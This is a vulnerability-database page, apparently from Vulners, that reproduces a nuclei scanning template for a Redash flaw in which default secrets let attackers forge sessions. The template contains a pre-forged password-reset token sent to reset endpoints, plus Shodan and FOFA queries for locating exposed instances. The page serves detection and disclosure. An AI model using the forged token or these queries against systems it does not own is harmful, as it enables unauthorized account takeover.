Lucene search
K

Redash Setup Configuration - Default Secrets Disclosure

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

Redash Setup Configuration - Default Secrets Disclosure. Vulnerable to default secrets disclosure in Redash setup config, allowing unauthorized access to sensitive info and potential application compromise. Remediation involves removing or updating default secrets in the config file

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-41192
24 Nov 202116:15
attackerkb
Circl
CVE-2021-41192
24 Nov 202118:27
circl
CNNVD
Redash 安全漏洞
24 Nov 202100:00
cnnvd
CNVD
Redash has an unspecified vulnerability
25 Nov 202100:00
cnvd
CVE
CVE-2021-41192
23 Nov 202123:50
cve
Cvelist
CVE-2021-41192 Insecure default configuration
23 Nov 202123:50
cvelist
NVD
CVE-2021-41192
24 Nov 202116:15
nvd
Prion
Design/Logic Flaw
24 Nov 202116:15
prion
Positive Technologies
PT-2021-23165 · Redash · Redash
23 Nov 202100:00
ptsecurity
RedhatCVE
CVE-2021-41192
9 Jan 202608:54
redhatcve
Rows per page
id: CVE-2021-41192

info:
  name: Redash Setup Configuration - Default Secrets Disclosure
  author: bananabr
  severity: medium
  description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
  impact: |
    An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application.
  remediation: |
    Remove or update the default secrets in the Redash setup configuration file.
  reference:
    - https://hackerone.com/reports/1380121
    - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41192
    - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-41192
    cwe-id: CWE-1188
    epss-score: 0.08017
    epss-percentile: 0.94059
    cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redash
    product: redash
    shodan-query: http.favicon.hash:698624197
    fofa-query: icon_hash=698624197
  tags: cve2021,cve,hackerone,redash,auth-bypass,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
      - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Enter your new password:"
          - "redash"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b100a6b7736e481f8071222d1dc89d40f31469b30df32c78df255a00565d373a022100fa923de2c9f91cbacc985c8237c58bd799cd39ef5c285afe69900ae3d95996bd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 23.5
CVSS 3.16.5 - 8.1
EPSS0.08017
49